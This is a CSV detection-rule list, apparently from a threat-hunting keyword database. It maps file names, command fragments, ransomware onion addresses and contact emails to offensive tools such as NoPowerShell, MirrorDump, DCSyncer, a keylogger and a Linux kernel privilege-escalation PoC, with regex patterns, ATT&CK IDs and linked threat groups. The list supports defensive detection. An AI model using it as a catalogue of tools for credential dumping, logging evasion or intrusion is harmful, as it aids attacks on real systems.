"*NoPowerShell.Commands.Management*",".{0,1000}NoPowerShell\.Commands\.Management.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53548"
"*NoPowerShell.csproj*",".{0,1000}NoPowerShell\.csproj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53549"
"*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53550"
"*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53551"
"*nopowershell.exe*",".{0,1000}nopowershell\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53552"
"*NoPowerShell.exe*",".{0,1000}NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53553"
"*NoPowerShell.sln*",".{0,1000}NoPowerShell\.sln.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53554"
"*NoPowerShell/*.cs*",".{0,1000}NoPowerShell\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53555"
"*NoPowerShell_trunk.zip*",".{0,1000}NoPowerShell_trunk\.zip.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53556"
"*NoPowerShell32.dll*",".{0,1000}NoPowerShell32\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53557"
"*NoPowerShell64.dll*",".{0,1000}NoPowerShell64\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53558"
"*NoPowerShellDll.*",".{0,1000}NoPowerShellDll\..{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53559"
"*normal/randomized.profile*",".{0,1000}normal\/randomized\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","53561"
"*northdata-get-company-names *",".{0,1000}northdata\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","53562"
"*noseyparker report --datastore *",".{0,1000}noseyparker\sreport\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53563"
"*noseyparker scan --datastore *",".{0,1000}noseyparker\sscan\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53564"
"*noseyparker summarize --datastore *",".{0,1000}noseyparker\ssummarize\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53565"
"*noseyparker-cli*",".{0,1000}noseyparker\-cli.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53566"
"*noseyparker-main*",".{0,1000}noseyparker\-main.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53567"
"*noseyparker-v*-universal-macos*",".{0,1000}noseyparker\-v.{0,1000}\-universal\-macos.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53568"
"*noseyparker-v*-x86_64-unknown-linux-gnu*",".{0,1000}noseyparker\-v.{0,1000}\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","#linux","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","53569"
"*Nosql-Exploitation-Framework*",".{0,1000}Nosql\-Exploitation\-Framework.{0,1000}","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Framework","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","N/A","7","601","146","2024-12-06T14:24:45Z","2013-12-26T17:46:11Z","53570"
"*NoSQLMap*",".{0,1000}NoSQLMap.{0,1000}","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Framework","https://github.com/codingo/NoSQLMap","1","0","#linux","N/A","N/A","10","3051","589","2024-07-28T00:06:18Z","2013-09-24T15:01:30Z","53571"
"*Not in high integrity, unable to MiniDump!*",".{0,1000}Not\sin\shigh\sintegrity,\sunable\sto\sMiniDump!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","53572"
"*notdodo/LocalAdminSharp*",".{0,1000}notdodo\/LocalAdminSharp.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","53573"
"*notepad FUZZ*",".{0,1000}notepad\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","53574"
"*Nothing was logged into the temp workingKeyLog!*",".{0,1000}Nothing\swas\slogged\sinto\sthe\stemp\sworkingKeyLog!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","53575"
"*NotLSASS.zip*",".{0,1000}NotLSASS\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","53577"
"*NotLSASS1.zip*",".{0,1000}NotLSASS1\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","53578"
"*notredamecheatstowin>*",".{0,1000}notredamecheatstowin\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","53579"
"*Notselwyn/CVE-2024-1086*",".{0,1000}Notselwyn\/CVE\-2024\-1086.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","53580"
"*Notselwyn/netkit*",".{0,1000}Notselwyn\/netkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53581"
"*notsoshant/DCSyncer*",".{0,1000}notsoshant\/DCSyncer.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","53582"
"*novagroup@onionmail.org*",".{0,1000}novagroup\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53583"
"*NovaLdr-main*",".{0,1000}NovaLdr\-main.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","53584"
"*novelbfh.zip*",".{0,1000}novelbfh\.zip.{0,1000}","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","53586"
"*novnc_proxy --vnc localhost:*",".{0,1000}novnc_proxy\s\-\-vnc\slocalhost\:.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","53587"
"*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*",".{0,1000}\-\-noWAIT\s\-\-noFUNC\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","53588"
"*nping -*",".{0,1000}nping\s.{0,1000}","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1046 - T1498","TA0043 - TA0002 - TA0007","N/A","Qilin","Discovery","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53590"
"*npkoxkuygikbkpuf5yxte66um727wmdo2jtpg2djhb2e224i4r25v7ad.onion*",".{0,1000}npkoxkuygikbkpuf5yxte66um727wmdo2jtpg2djhb2e224i4r25v7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53594"
"*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53602"
"*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53603"
"*nps_payload*",".{0,1000}nps_payload.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","N/A","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53604"
"*nps_payload.py*",".{0,1000}nps_payload\.py.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53605"
"*nps_payload-master*",".{0,1000}nps_payload\-master.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53606"
"*nrf24-scanner.py -l -v*",".{0,1000}nrf24\-scanner\.py\s\-l\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53609"
"*NSAKEY/nsa-rules*",".{0,1000}NSAKEY\/nsa\-rules.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","53610"
